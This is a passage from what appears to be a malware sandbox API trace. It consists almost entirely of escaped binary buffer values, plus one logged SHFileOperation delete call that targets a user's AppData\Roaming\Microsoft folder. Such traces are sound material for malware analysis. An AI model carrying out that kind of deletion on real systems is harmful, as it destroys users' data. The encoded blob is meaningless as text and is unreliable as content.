c4b\xe0ea\x11d0\xba02\x4045\xe3ff\x428b\x5ebf\x5083\x809b\x2ebe\xf5a0\xe831\x1c07\xd9fa\x39bf\xfff4\xf404\x18d5\x9eb4\x1b43\xf405\x125\x175d\x6e83\xd0e0\x8bf\x73e8\x7a02\xc5f\x5bfa\x7d0e\x4054\x129f\x9bd0\xd062\xe0a\x2c5d\xcfa0\x6808\xc56\x98ba\xb43\xf405\x171\x1fed\xce83\xd0e6\x231\x54a\x5bf4\x146f\x813a\x743\x6808\x80a5\x17be\x5e83\xa1ce\x6f5d\xe870\x16a\x8ead\x741\x6872\x1bdb\xfa3c\x2f25\x1d17\x8e1e\x644c\x2ed0\xe871\x9166\x10d7\x5779\xf2c4\x517e\xd08e\xdfe7\xaf88\xcef7\x7418\x873f\x12ae\x47d0\x3404\x62f\x877d\xe743\x680a\x80b9\x888e\x5f41\xd0e5\xbd09\xb5ea\xa0c5\x704f\x5ba8\x5740\xe80a\xf967\x71b1\xd0e6\x104\x407d\x1b40\xd063\x393b\xfd94\x438b\x16ef\xbfd0\xa0c4\x1c85\x43ba\xa740\xe80b\x31a3\xf5e8\xfa1c\x809a\x4fa\x7174\xea0c\xd0e6\x4c7\x9274\x1680\xa0c6\x397d\x58b4\x5540\x1d01\x8313\x9776\x7421\x809a\xb66\x80e8\xf418\xe13\x46bd\xaf40\xd010\x9ae\xe851\xe4e\x281d\xc3a0\xb405\x62d\x937d\xbb43\xc9ff\x6ba3\xf027\x1df9\x9b12\x17df\xf439\x17d\xc3fd\x4e04\x4fb5\x7772\x889c\xccad\x351c\xa1f\xf98e\xb6\x42bd\x7710\x1b5e\x1279\xcf80\x81ec\xf703\x1745\xa183\x12ff\x47c5\xd812\x8830\xc32\xc297\x9a2f\x5202\x3761\x5728\xa822\xe14c\xc112\x6330\x36bc\x964f\xc0e4\x4d80\x63df\xda34\xc5ea\x7a9a\x8c6d\x69a7\xd4a1\x2ee0\xe960\xb7b\xad68\x71ea\xfde8\x5771\xc6a6\x8a49\x11b6\x7ba3\xc950\x9451\xe191\x5add\xa7e3\x5ade\x5d47\xfedc\x2e1a\xae82\xb85b\x58ee\xb47e\x1f90\xb51f\xa9bf\x446\xad7\x1e77\xd0c4\xec93\xd479\xbaaf\x5ba2\xbfda\x8dc1\x9b88\x6cac\x64f1\x5ede\x62a5\x2458\x8ee2\xbcc9\xa9c5\xf8c6\x16df\x1f71\x1b0f\xca00\x6c4d\x52b6\xc451\x65b7\x78ae\x9e1c\xd6ea\x7801\x27a2\xd764\x720f\x5055\x7a5\x2ed9\x6e82\x505b\xe57c\x3c16\x12b2\x8b1a\xa845\x58d5\x82c2\xd8e0\xe6a7\xefa3\x7bda\xda66\x7fe4\xc7a2\xead0\xa1cf\xc19a\xc050\x2822\x1e80\xddc4\x109b\x2ee1\x9565\x65a3\x67e1\x81d7\x39bb\xc826\xdd7b\x96e3\x62e4\x1b44\x67e1\xdf52\x5c82\xb9f3\x5007\xaa8a\x81f2\x6ee6\xf5ae\x4f64\xc937\xc6ec\x9c93\x91cd\xbe92\x5ae5\x3d9a\x20ef\x7816\xd510\x97f9\x926\x3608\xa34a\x9175\x1a58\x3d89\xce24\xbb18\xbd20\xed5a\x2174\xed96\xeb62\x20fc\x2c83\xf4da\xfa2d\xa41d\xfcad\x3087\x8407\x808\x2762\x587f\xdd3a\xeb0b\x2c28\x79c2\x92eb\x92ab\xe416\xeb66\x2a69\xd8b4\x4984\xb3ab\x8bf8\xc86a\x6ff8\xa2a1\x4f92\x2d70\xcbca\x7aab\x9dc3\xb30d\x8ac1\x7771\xc43c\xe4d7\x2819\xb746\xb468\xcf86\x99a2\xea36\x621f\x8eb\xd67\xf9a5\x7bb1\x3484\xf38f\xd20a\x483c\x8bf1\xdd40\xcd2c\xa889\x779a\xf5d5\xd548\x4bc\x1af6\x73b4\xd9e7\xcf91\x2f9c\xcd72\x22f9\x8fef\x148f\xb751\x9461\x8fd8\xfda1\x9f85\x1f44\x8b10\x3ae\xc602\xc3a3\x335\x238\x9dc7\x3833\x8ac9\xd2e2\xb129\xc174\x361c\x3fb9\x7417\x204f\xa22d\x1f0b\xcd09\xa276\x9b7f\x75c4\x78cf\x31c3\x6faf\x5c68\x7539\x2213\x38e5\x6585\x942b\x57e6\x4e65\xdb2f\xa1bc\xec9\x99a4\xccab\x56d\x5ad6\x3241\x9457\xb1c\xc7a9\xee8c\x4b7e\xaa13\xa153\xbaf8\x5af2\x2a2f\xa8ee\x1b68\xfb27\xcaaa\x5ac4\x2824\x7a95\xd9b7\xde50\x8ad1\x71d4\x143e\xf68b\xd66a\x555a\x98d9\xc037\x6ca7\x9d9c\xf500\xfba5\x35ad\xcabe\xfac3\xb445\x4530\xecf3\x492d\xc4a2\xdd61\x79a1\x94f6\x55f4\x6b71\x26b9\xe7c3\x2e69\x24f9\xf7bb\x815\x76f1\xd477\x2e15\x1bfc\xc6ca\xec2d\xae1a\xe824\x4823\x11e6\x183c\x3103\x506b\x4219\x355f\xe79a\x65ae\x4fc3\x1ab4\xb2ed\x6b70\x65e8\xa747\x9bb5\x6e0a\x4a03\x75ca\x56e8\xcce\x38c8\x6d62\xaecc\xcf29\xabc5\x254\x9b29\x2d93\x9d08\xae9a\x593c\xcbd3\x131f\xc4a5\x2161\x864\xd934\x7b4c\x75e5\xf694\xb1d0\xa8b4\x8481\x38e6\xa860\x4a92\x7bfe\x5d56\x3fc2\xcf74\x647c\xcb9f\x8f5f\x5bb8\xad9a\x8961\x10a1\x9eb6\xcdcf\x271c\x41df\xe56c\x1b17\x134\xf78\x2f80\xaf9\x77a4\x3f91\x7a94\x5380\xf64c\x7ceb\xa45b\xbe62\xee7c\x1e1e\xa254\x4af3\x4606\x412a\x4df\x4434\x1545\x4b0b\x5f9c\xaa6f\x3e7f\xadea\xf534\x2c56\x1cca\xc9f5\xc26b\x2d77\x1735\xc1c3\xebd4\xc3c5\x1e23\xe6e3\xcb8b\x7019\xa21c\xb22c\xc4c7\x4596\xf90f\x8fb2\x2f79\xcfbe\x30bd\x4db\x6825\x766e\xdd17\x7c63\x5161\xb62a\x7e23\x617c\xefd1\xafc1\xfc02\x6d9a\x617c\xa7d5\x5f1b\xf4d8\x8d2b\x122f\x81f4\xee6\x2c7d\xe3bb\xd307\x188c\x875c\x371c\x70cd\xb01e\x4dbb\x70f3\x538c\x9ff\xe8f\x39ca\xd8cf\x4537\xdfd4\x11e1\xe5e\xdfe1\xf08b\x1833\xc45e\x29c6\x33c2\x950e\xa346\xecd1\xc458\x5e77\xbfd7\x39c8\xeda\xc8ad\xb89e\x925f\x6f72\xe9b5\x7017\x79af\x1260\xedb5\x6236\x46dd\x8d3c\xac25\xb057\x8ed4\x2cc9\xbf80\x7a1\x51d\x86f4\xbb0\xbb2a\x5458\x436\x5b1e\xf6f9\xf406\x4cd3\xebfb\x915f\x75f3\xdfb\xe653\x3d3e\x5d\xa829\x334\x6a49\x66e8\xfb2b\x7bef\xec40\xa695\xee\x3d2d\x3a15\x5eb6\xcb7d\x7d9\xe446\xf274\x6cd2\xf955\x7c3\x57a5\xf468\x686f\xc3a4\x9cc3\xc419\x13f8\x3be\x11d8\x4698\x6ed7\x4ac0\xeebc\xd85\xedfc\x8d1\x9720\x4ea6\x7da\x7e3c\x9a0f\xa86b\x46fd\xb778\x7a36\xacf6\x9cbc\xed14\x7ae0\x5ad5\x61de\x5e63\x43a3\xb732\x6705\xa240\x81d4\x2890\xfbc\xdb97\xff6f\xaa82\x261\x934\xa93d\xf97e\x69b5\x9962\xf4a9\xac69\x3682\xe6ab\xb0c1\x3f9d\x89a0\x23ca\x397\x61c6\x1533\x463\x69bc\xde41\xc854\x54a0\x47f6\x60b7\x5b68\xb790\xc3ad\x7dca\xe2ba\xef3c\xe2b2\x772c\x3e80\x45a9\x1b11\x319d\xb83e\x750c\x1e2\x609b\x4dc6\xaf76\xed0d\xa5f2\xc4cb\x42d6\xf0b6\x8e7e\x73e1\x9abd\xa12e\x4cab\x1ae5\x8c44\xbc5c\x3fb\x31cf\xf5d3\x7c35\xf70b\xa002\x6a97\x36fe\x41c5\x693c\x1bf\x52c5\x481f\xd0cb\x5412\xff69\x3406\x8093\xcd83\x9123\x6163\xdbf6\x4250\xcdca\xa077\x73ff\x93be\xf156\xa964\x313b\x1f59\x8a36\xc59f\x8dc5\x29ba\x5a4e\xa08e\x2d57\x8181\xa346\xc825\xf503\xe9f9\x3872\x7151\xbe5a\x5651\xa4cb\xae97\x2793\xa936\xd95d\x197b\x4432\x9463\x1eff\xc719\x4ce8\x7fa0\xfd83\x7bfa\xc744\xb4cc\x30ed\xe1ee\xe334\xff4\x181\xf60d\xb191\x3fe8\x3442\xb6d\x320f\x7f4e\xe81f\xe68f\x571e\xdd83\x811e\xd9d2\x32b6\xd1d0\x3d25\x1d05\xb227\x978c\x25b0\xf03f\xf3ca\xd4e6\xd8fd\xf1d\x5ba1\x9d3\xfe3d\xccb6\xbf71\x4bd9\x85df\xb586\xe78c\x1b63\x955a\x8242\x6d13\xb824\x5d6\x6dbc\xee13\x28a2\x6b1b\x7c16\x57f3\xa7e4\xc237\x64e8\x599e\x1b67\x55e\x647a\x5a1d\xbe43\xa121\x6c7\x3143\xb19b\xeb35\xb96c\xccfc\x3115\x77\xbce0\x9026\xf19d\x56be\xd7a1\x65dc\xf6c2\x2657\x7f6c\x39a5\xdb51\x315f\xb4f7\x493f\x36fd\xdeae\x699b\xfe1b\x492c\x245b\x9aee\x54ac\x158c\xd59b\x5da8\xc957\xf6b8\x7ad7\x4aea\x5bbe\x75e7\xaacf\xbaf7\x5d8b\x6598\x7856\x1784\x9ef\xde51\xc6c\x7aa7\x4b9a\xd2fb\x7ada\x4a6f\xcbb1\x4904\x71af\x97c9\xd8c4\x5966\xa967\x9a8\x4fbc\xd927\x4db8\xf711\x8be4\x96c5\x657c\x85b1\xdfdb\xbe22\xc2f9\x36b8\xe348\xc7c6\x93c\x1032\xcfa\xe8e\x2adf\xf90f\xb98a\xcc0a\xcbb7\x45b1\x5a5e\xdd97\x2fc4\xd9a2\xffef\x2c91\xc595\x7250\x5cef\x356a\x5dee\x3245\xe73e\x4e47\x2be6\x42d6\x62a1\x757e\x2c03\x4f1b\xa361\xe848\xc1e6\x665a\x974b\xd645\xca93\x38fa\x75d5\xc75e\xe1e7\x2ed4\x458b\x9677\x71f5\xb041\xe7cf\xe555\x4a38\xc4e1\x72fa\x13b1\x3dc7\x2cb1\x6cc4\x340e\x6f85\xf904\x4a02\x86f0\xbc26\x86a0\x5cf2\xf746\xa5e0\x280e\x3426\x15c1\x514e\xd431\x4a17\x4d09\x3f68\xcab\xad10\x8460\x95f7\x1034\x2a1a\x988e\x9d3c\x428d\x2a48\x998b\xcf3c\x43f2\x98e3\xfec6\x87dc\x6ecb\xb534\x340a\x4aed\x4f4e\x59c8\x91ab\x2538\x3edc\x167e\x3389\xdf7c\x54a6\xbb2e\xe51f\xa886\x417\xe2c1\x78f8\x3586\xd200\x13e9\x8fb8\xa75c\x1c99\x818\xc962\xe393\xc990\x2ca2\x69e7\xedd4\x92ac\x5f71\xdfc7\x7623\x1f06\x79e1\x7da9\xf3d\xdd79\x9d59\x70a6\x1187\xfc35\x98ee\x57f0\x8475\xb8a6\xf3d8\xe2ad\x217e\xc700\xb7f6\x7b63\x3d44\xf277\x5644\x93af\xd1aa\xb262\x7e36\xb37c\xa593\x6673\xfbf6\xbe6a\xc257\x7e06\x9a6f\xda5e\xc9e9\x29b7\x8715\x7f71\x320\xce65\xb947\xb241\xdb2d\xf2e4\x237f\xb6a7\xa2b5\xcd7d\x5ba1\x306c\x2b0d\x6dd0\x5d05\xd056\x573\x565d\x75d0\x5d05\xd056\x575\x565d\x75d0\x5d05\xd056\x575\x565d\x75d0\x9d45\xb7eb\x4236\x3154\x7544\x59e2\x2049\x8db7\xbbd\x3422\xcf0f\xb93f\x1e82\x7810\x1054\xefe3\x1195\xbba3\xe051\xe34e\x78ed\x5aac\x96ac\x23c4\x9d4b\x9f66\xbf40\x9448\xb3df\x861b\xcc74\x78e7\x1135\x5def\x69a7\x5aed\xf38b\x5166\xed2a\x6e32\xbc96\x45e5\xa52d\xad12\xef61\xa0e0\xf142\xbeb3\x8980\xf9a3\xd036\xef77\x2590\xef9a\xda08\xdca7\x9381\x2064\x83d2\x3228\xa315\x820f\x505e\x8af5\xe269\x637a\xb29c\x4caf\xd583\xd948\x9de8\xb292\xd40\x9056\x200d\x987e\xc2db\xd09f\x883\x3f2f\xdc85\xe569\x9005\x9d64\x7077\x84fa\xaaa\xef39\x9e49\x63e0\x4ef4\x372f\x3311\xe57\x4524\xeb2d\x62a\x723\x14c2\x4f85\x8a41\xf086\xb047\xaf02\x2f1f\xb04b\x77be\xb52a\xd9b2\xbd88\x5d4b\x3105\x77a2\x3e33\xdec3\xbb0d\x3c7f\xdd76\xcd0a\x247f\xe20c\xa644\x6dd1\x2e06\x2181\x7b19\x263d\x48fc\x3ee7\x191a\x9690\xfa7d\x546d\x8f2\xb3db\xa261\x554d\x5cb8\x1dc4\xc202\xd873\xc5b3\x569a\x9117\xee7f\xbb73\xfce2\x2130\xfdad\xd9d7\xfe11\xddc6\xdfdd\x4767\xa24e\x8882\x12d3\xc548\x6eca\x653e\x1d9a\xb5e\xcc4e\x23a8\x3130\x4bf4\xab75\xe4d8\x9edb\xa39b\xa054\x9b2b\xfd6a\xc40a\x2cdf\x7e3\xc97b\xd0d1\xe923\x5816\x3d7b\xca0d\x9c5a\x6554\x8b63\x5699\x8afc\x9160\x5936\x4658\x685d\x2d15\x448d\x38a\x53da\x71d2\x4eb\x9787\x7fbd\xf01d\xe5a1\xedc0\x85ff\xe4f3\x85cd\x5591\xfed6\x6229\xbd54\x2f24\x7747\xa25f\xe6e7\x94e5\x7ac8\xf2b6\xc3e6\x7032\x8b54\xd3d7\x74b0\xee18\x900e\x7e50\x13a\x3db9\x5bb3\xa50d\x58dc\xb0e6\xadf9\xfe0d\x96cc\x77c0\x6fc8\x72f2\x4c6\x6980\xfe5\x74d9\xdd06\x1c5e\x288e\x4e90\x95b1\xbc77\x2b02\x4829\x1d76\xdd36\x7465\x82a4\xddde\xdba4\xad09\x8f0f\x3180\xdd5a\xa304\x183c\xc1ef\x17c2\x64c0\x1dfb\x92f8\x2f08\x135a\x12e2\x2947\x706f\x23b9\xd6c\x3a96\x6848\x8a79\xb1b2\x2f9e\xb054\x754a\x7560\x63b9\xb8bf\x964d\xca94\xa33f\x383f\x78c8\x9edf\xeddd\xaf4f\xac05\xb77d\xf800\x53ae\x5d0b\x7288\xbde4\xe730\xe36f\x8015\xdafe\x6d4f\xd605\x3f66\xa3dd\x5ce6\xe7ad\xbef1\x8f5f\xc6fd\xc4c5\xa9eb\xea59\x85f6\x650a\xa055\xe967\x7520\x825d\xdacf\x3aa0\x43bc\x31d2\xcf81\x107a\x2cd2\x8f69\x410e\xdf8d\x75a8\x5814\xf84f\xbf33\xbc0a\x306\xcd8d\xff2e\x778a\xb47f\x95f1\x1f4d\x7c6a\xaa95\x9aa7\x12d\xf9e8\xdc58\xc29e\x8f9e\x1bd5\xcf45\x16c7\x8a35\x8f9e\xd69d\xab88\xe1c0\x3cc8\x5f41\xa652\xc684\xdc8d\x562c\xaf67\x8dd2\x9b07\x7e43\x3f8b\x60f3\x2be0\xa444\xbba7\x6771\x9c57\x2e1\x5d66\xdb4\xb599\x39d8\xcf85\x1222\x35dd\xce15\xe7b6\xab8\x21d\xbb3d\xe97d\x8e0a\xa07b\x1068\x77c5\x812\xf5e8\xf95b\xa709\x8b80\xfead\x34d2\x56c5\x745\x71be\xcab3\x4d57\xecc8\xab52\x9120\x1b46\xdb70\xfed3\x4c72\xbed4\xd73c\x1ee\x800e\x4fae\xeccd\x6fc1\xd4f0\x9e81\xfe1a\x5b2b\x1c77\xb09\x2c37\xead8\x2bd8\x4262\x367f\x5205\x5fb1\x22c6\xbaa3\xbc59\xd22f\xeff9\xfaaf\x941a\x59e1\x3c56\xd529\x3514\x54bd\x12f5\x73f2\x4173\x9e7\xe1ad\x21f2\xf8c8\xd928\x8d1f\x4186\xb7ac\xdc01\xa7ea\xf1e8\x54aa\xc4dc\x166d\xa3aa\x8b00\xd151\x6248\xdb74\xa903\xd05a\x80ef\xf415\x8efb\x112c\xb25\x6265\xaf04\xafe7\xf2af\xebe5\x5c5f\x7e0e\x6c8\xf082\xb8d7\x96ab\x6bc5\x8437\xbde0\xa9cd\x3505\x374b\x3f29\xd585\xf8ae\x3cbc\x31f7\xaa49\x5ba1\x5050\x280e\x60d\xd3e\x9a14\x825f\xf2af\xf5dc\x8c00\x9746\xf463\x1e3a\x38fd\xa746\x6888\x32dc\x2f0e\xcf29\x75fd\x5c5c\xc625\x53dd\x1b9e\x8b8a\x3143\x7c39\x7953\xafee\xe2e2\x62d6\xf5dc\xb9e5\xc44f\x61c5\xe10d\xca4b\xff73\xe96d\xb89\x5c61\xf2ff\x37dc\x2e30\xc449\x863d\xc02b\x37af\x4f44\xa8dc\x6b66\xf790\x9c22\x8384\x204\xc41c\x2090\x931f\xb68e\x233\xcf2d\x1923\xa356\x8403\x31a7\x4890\x3b1b\x3cdc\xe819\x3804\xa303\x2165\xf40b\x26e0\xe7f5\xf6a0\x676b\xb68f\xca23\x214d\xb422\x844a\x8b66\xb150\x2d08\xa114\x447b\x58a8\x6684\xd088\x1132\xc89a\xb443\xa22c\xdb54\x58d9\xf111\xb8a2\xe2cd\x77ba\x5a39\xfc40\x8830\x9adf\x162a\xf9fc\x729f\x8549\x490a\x4505\xc811\x217a\xa42e\x2083\x37cf\x71d9\x4a02\xfb02\x11cf\x1d5c\x985b\xbfeb\x2c40\xd91c\x112f\xb7d9\x9c70\x3d03\x132b\x128d\x1eb9\x69ac\x177c\x7e30\x87d\xf294\x783\x80f\xeb76\x8d7d\x411b\xc0fd\xab14\x2573\xbd69\x6128\x973f\x9a2d\xd559\xa111\x4554\x2289\x17a6\xd4d1\xaea7\x2585\xa4f0\x8fa9\x8140\x2fa7\xf7b\xa76a\x65a9\xcad7\xe0fc\x5ed6\xc9f6\x457f\x4f09\xf0b\xd8b4\xcbe\x2c1b\xcf45\xe0e1\xaabe\x593\xa21a\x30d7\x9a42\x1b1e\x9987\xc1f6\x30f3\xa916\x4257\xb489\x2d9b\xc5e5\x5cf1\x6093\xe075\x7aa7\xd258\x68e1\x3ea4\xa686\x78da\xaddd\xa16c\x39a8\x9c72\x4ae7\xe4ae\x3cd4\x648f\xc531\x661\xe1ad\xf644\x8fcf\x300\xe30e\x95d2\x3bf1\xace9\x957b\x9e76\x5feb\xb219\x5e3f\xfdc7\x7175\x8cce\x9dbb\x8352\x217a\xd877\x8ae3\x7719\xc3d8\xe0b\x417\xe7cb\xc371\xf968\x392f\xb517\x194f\x4283\x3962\x449f\x25e3\x6d14\x2125\xae26\x98fd\x8fcf\x421\x48a0\xdde4\x469f\xefa7\x1c17\x8c1c\x5f4e\xd800\xfd9a\xebc6\x2cb1\x4783\x8a51\xe60f\x2ebd\x5d36\x3ea3\xd315\xd674\x4ed9\x5df6\x703d\x57b9\xe13e\xf10c\x124e\xed4a\x1a03\xfb2f\x1216\xed07\x5def\xf323\x193\xf893\xa50\xc85f\x87cd\xe362\x4599\xdf53\x46b8\x678c\x7ffa\xfe78\xc48b\x7bb5\xe11f\x32dd\xc569\xc5cf\x53c6\x7598\x5912\xa89f\x2cf6\x33fc\x668f\xd4d0\x6b92\x8a04\xb0a4\xa1e7\x234e\x6ef5\x7308\xb62f\x468e\x224\x6348\x4da6\x9e7c\x412b\x9178\xfda6\xd32f\x5d61\xaa7d\xd696\xfb0a\x31a3\x59ea\x9088\xf97a\x4556\xe6e5\xaeb9\xe588\xfca7\xd0a8\xe7c4\xc9b9\x64a6\xc4ec\x2868\xfd7a\xd9d6\x4848\xbd07\x7a1\xf11a\xde7c\x6dc7\xb1d8\xae46\xf90f\xffb2\x5883\x9834\xd284\xf892\xee68\xff64\x1cbc\x7246\xb23d\x17d8\x3c84\x3579\xebd4\x5e0d\xd171\x602f\xec04\xb252\xdce0\xbb9\x2560\x9296\xd188\xf4c7\xef06\x294e\x3bbb\x6ca7\x9a9d\x5ee3\xa55d\xe6\x3724\x929\xb62\x55bd\x6b77\xfd78\x6e10\xc2c9\xb1b4\xb269\x7e14\x550b\x5049\xad32\x6830\xbc0b\xafb9\x9fb8\xb6e0\x9f7\x9d9c\xb857\x159f\x8917\x152a\x7357\x7b1b\xdb1\xe1ef\x21ca\x5945\x6b7e\xae17\x793c\x56ea\x7abc\x9bd7\xe39b\xb455\x2d9c\xeedc\x5303\xcded\xbf1d\x816a\xad2c\x252c\x6b68\xc5df\x387e\xd3d8\x6e47\xf561\xf1d2\x4077\xf082\x5234\xfb4\xe344\xa03b\xfe29\xada0\x2bd5\x315f\x171\xee1a\xad6d\x7d3d\xecbb\xbedc\xbf9d\xe14f\xb306\x5c2e\xd2a6\xbdef\x8b78\x16a0\x22ba\x8a01\x3d55\xcae6\x84a5\x25f6\xd521\x6042\x5ab9\x5532\x4aed\xf590\xf029\x8ed\x9924\xbf69\x2dfc\x90b7\x407a\xc69c\x5b43\xddb5\xe376\xe1e3\xd164\xd9a1\xeb7e\xefed\x914a\x9ae3\x2409\x568\xa779\x1f2a\xae84\xce29\x2398\x9bc1\xc40\x7e66\xd98a\x7280\xdfb9\x17ac\x6383\x73d4\x2289\x5c2f\x6d11\x5f8a\x7adc\x9864\x2556\xf784\x9207\x13a2\xd164\xb347\x7589\xbcd8\x72a9\xeb4\x82b\xa2b7\x4e85\x9de5\x877c\x99b2\x4225\xfc7d\x5c10\xbe7d\x3ca3\x8934\x549f\x6a33\xabbf\x82ee\x2ab2\xc54d\x68db\xdda6\x1bfe\xa971\xa00\xc6a5\x7949\x44c9\xb87e\xe9ff\xf0df\xe53e\x416a\x5d90\x8c6b\x4b6e\xfa0\x6916\xe634\x5385\x6e8c\x206b\x8449\x671c\xe7f7\x76b3\x9fde\xc5f0\xd491\xd700\x8f50\x3fb2\x4335\xd058\x6ef1\x4e8a\x706f\x85d9\xcba2\x971d\x7a41\xd981\x1e37\x85c1\xd50b\x1ae2\xb52e\x1cf\xb895\x334\xe354\x2ac\x945a\x7313\x3b55\x2f8f\x905\xbf8d\x50b3\xde96\xe3c9\x3f08\xd51c\xebdd\xc848\xd9c0\xf0f\x9633\x48a7\x127a\xd236\xeb4c\x67c\x2413\xa312\x766e\x3914\x4ada\xe140\xd851\xe42a\xc60d\x12a5\xcb3f\xee6c\x540e\x239f\xc530\x65d9\xa351\xc635\x988f\x668f\x3b36\xe47b\x9e28\x1db0\xc1ff\xe8d4\x11de\x4e8a\xeb07\xbbed\x7501\x3780\x78cf\x9f96\x3fc5\xb680\xe0cd\xf7f8\xf8f2\x1045\xbdba\x23cc\xac05\x1e84\xdf41\x822b\x8c46\xb13c\x2183\xb22e\xb174\x3e72\xb8c9\x6fc2\xc532\x70df\x39e2\x7a5e\x292b\xd0d2\xf32b\x59a4\x137a\xd09\x4e38\x7b3c\x7c4a\x9620\x3bb1\x440e\x595d\xb1f4\xc85a\xd9d6\xae53\xbab8\x9450\xc99a\x2cbd\x4fd1\xfc7b\xd0e5\x3c12\xea96\xc3ca\xe653\x2b61\xe07a\x31e2\x121f\xc5d5\xaaee\xe9fb\x6473\xa2fc\x2b0\x1b3c\xadd7\x971a\xe248\x4f2a\x7235\xa84a\xaf72\xa89e\x2d05\x187e\xecce\x6563\x119e\x7e81\x35d9\xc795\xdef2\x811c\x3017\x7598\x8594\x53af\x4cd\xbd5c\xd713\xab59\x8912\xa0d9\x99bc\x808d\xecdd\xdf4\xf51c\x9ffa\x705\xf720\xae7b\x163c\x7bf8\xd95e\x9719\x9e\x7ddf\x7f02\x34c0\xea7d\x9927\xd852\xcc4a\xece6\x182e\xa558\x7d02\xcb4e\x2e3c\xe61c\x13e\x643b\x1f0d\xf1e7\xc2f5\xac76\xfa27\x3783\xdb62\xd354\x8ee6\xaa18\x98c2\xaccc\xf32d\xaedc\x6177\xc783\xec56\xc08\xecab\xa902\x943b\x972f\x8ce5\x6280\x5b68\x1938\xa927\xbb2\x417a\xf73b\x8474\x669d\xd613\x509f\x789f\x343b\x5a11\x120c\xd1fe\xd675\x1a8a\xab5d\xaec\xc638\x74b9\xb8ef\x7a3e\x8c1e\x35c6\x3bca\xcc8d\x8375\x5890\xa086\xbf04\xcd0e\xbc80\x906b\xd22f\x70c9\x4012\x2012\xa21e\xffb0\x5d66\x1dc7\xb77c\xd785\x8921\x1db4\x2183\x7b0a\xf361\xc603\x1762\xe67e\xdb88\x64f9\x407d\xbbe0\x11ef\x5c08\x81df\x33a8\xf4ac\x1906\x741d\xdc40\x10b9\x8ad7\xc37f\x8ca8\xaf1b\x605b\x61e4\x5c5d\x2efc\x31a4\x88eb\xdb5\x177b\x2cf8\x4934\xd7e6\x909e\x46a2\xcf76\x815e\x417a\x1b3b\x882f\x2b7c\xe714\xe286\xcc60\x42f5\x7ecc\x6415\xf32f\xf8c\xcb15\x95fa\xe8a4\xa8cb\x2e3f\x14bb\x6b3\x5df9\x7702\xd3f0\x713\xf0\x3f45\x567e\x303c\x138f\x5163\x543d\xd48a\x11b2\x6d0a\x2f19\xaaae\x4168\x376c\x6d46\xcf1d\xa27d\x952e\xec1a\xdd4f\xb31d\x9f70\xd5c7\x770f\xa661\x6240\xb4f6\x78c8\x6603\x48ec\x5ee3\x677d\xfab9\xd85d\xf516\xbd4b\xeddd\x1c8a\xc569\xa59b\x8c07\xfdc4\xf9a0\x12e9\x32d9\xe5e6\x5723\x6fc\x5f0f\xea79\xf02\x5090\xba41\xb699\x49f6\x90ec\x1d2f\xa58f\x699a\xa059\xd047\x721a\xbe35\x7bcf\xef92\xbb01\x61a2\xc20d\xe7d4\xb522\xc0ed\xab7\x249c\xde1b\x7db3\xacf0\x528d\xa43a\x91f\xec81\x5a9e\xe288\x85ad\x7de1\x847c\xe3b8\xa082\x6a3b\xbed0\x846e\xcf0\xa3b8\xc7ee\xc3fc\xccf3\xefb4\xcd7e\xbeef\xac16\x7a21\x4195\xac1b\x59d3\x5578\x9d50\xde05\x3b2\xb15d\xa3b7\x162\x6cca\xb8d3\xe78f\xd39e\x851a\xf161\xa686\xd9c8\x5e4d\xd57e\xd881\x9df6\x4f8\x3dce\x37e3\xc281\x1e3c\xc6e1\xd440\x7556\x9795\xb3c0\x3663\xceae\x3766\xcdf1\xe117\x9d44\x4fc\xdd9f\xf464\x4c0f\x8fdc\xf7\x7176\xb3ef\xbfe9\xda16\x326b\xf90f\x1d7e\xcb9d\xb8c2\x8913\x6978\xbf1f\xe075\xee4e\xbc2f\xab0\x17af\x4104\x3cab\xbb97\xcf80\x1e30\xb74a\x6e05\xaaa2\xaeb\xb3c\xcb06\x52d6\x5095\x6f15\xd071\xe441\xb428\x2101\xc60e\x614b\xd4e8\xbc1c\x86fc\x33fa\xbdcc\xc3eb\xd8c3\x5461\xba29\x2724\xc91e\x6153\x7525\xe960\x8409\x66ca\x33a1\x9b2\x73d8\xeeee\x66a2\xf864\xcf76\xf3a6\x87dd\x6a37\x3893\x34cb\x120a\xbef5\x2663\x5379\x39dc\x4a4\xc700\x21ce\x37f9\xef9d\x521c\x4e6c\xfe3\x1724\xf46a\xf72d\x7c8b\xec7d\xe8d0\x5d7\x1db4\x3faf\x4505\x20a3\xa676\xbb34\x8f0e\x3fb2\xdeea\xa7c0\xdfa\xabf7\x66e2\x2a0\x51e8\x7e5f\xb3e8\x2915\x21e8\x5ea0\x8596\x49ca\x4dd1\x1a29\xac7a\xaed7\xd47b\x86dd\x91fc\xaf6e\xcbe2\xa3c6\xa16e\x81a0\x49ae") | out: lpFileOp=0x8bf870*(hwnd=0x0, wFunc=0x3, pFrom="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft", pTo=0x0, fFlags=0x614, fAnyOperationsAborted=0, hNameMappings=0x0, lpszProgressTitle="\x7df2\x3dce\xc953\x484b\xd76e\xe3ef\x12ec\xf625\xe82c\x52a5\x67f1\x1d01\xa1c1\x7217\x3768\xe797\xfa35\xb619\x4322\xe113\x621c\xe57c\x2e40\xac0e\x4cf3\x12c9\x9f9c\xf6cf\xea42\xc4dc\x2580\x29fc\xddc6\xa843\xa662\xda1d\xf9cb\xc236\xf1eb\x9835\xee68\xf283\xbc77\xe588\x25bf\x1080\x27fe\xbf0f\x17b6\x29ad\x69f\x9aec\x5ba7\xa4df\x4fd1\xf3b1\xd9c0\xc1be\x5667\xe6ac\x8b48\xcfc2\xb600\xdf1d\xb1cf\x76d\xd83c\x33b0\x11c\x14bf\x4751\x2a30\xa209\xfbd6\xc340\xc455\xd518\xf8c3\x3042\x4970\x3d83\x8579\x1a18\x7801\x1d\xdd2a\x52c5\x9b4f\x3c26\xb4cd\xbdac\x3088\x4530\x84c5\xce6b\xf6c6\xce3c\xefbb\x6f50\xf3e7\xc885\xb7bb\x4ee3\x3f28\x4742\xe8c0\x850f\xc415\x4dba\x8e6e\x17df\x7be0\x9653\x8860\x639f\x6801\xb053\x624f\x7b42\x7d9b\xf696\x9b36\x953d\xd5cc\x81a9\x413c\x55da\x7bb3\x53a9\xd665\x5b38\x74c3\x1961\x336c\xc94e\x9581\xe56c\x9cb5\x1310\x6bb3\xae3a\x4643\x34d6\x8456\x559\xc200\xec1d\x81c1\x9ac8\xdbaf\x97c3\x9ca9\x8017\x3702\xc0de\xefdf\xe5b\x8bef\xee78\x1287\x7f59\xdd4c\xcccc\xc5c\x1b2f\xfece\x8e39\xcbf\x4584\x1f67\xa8c\x9894\xda6c\x86af\x1d2c\x713b\x8ac4\x5d20\x4778\xdee5\x34c0\x1f6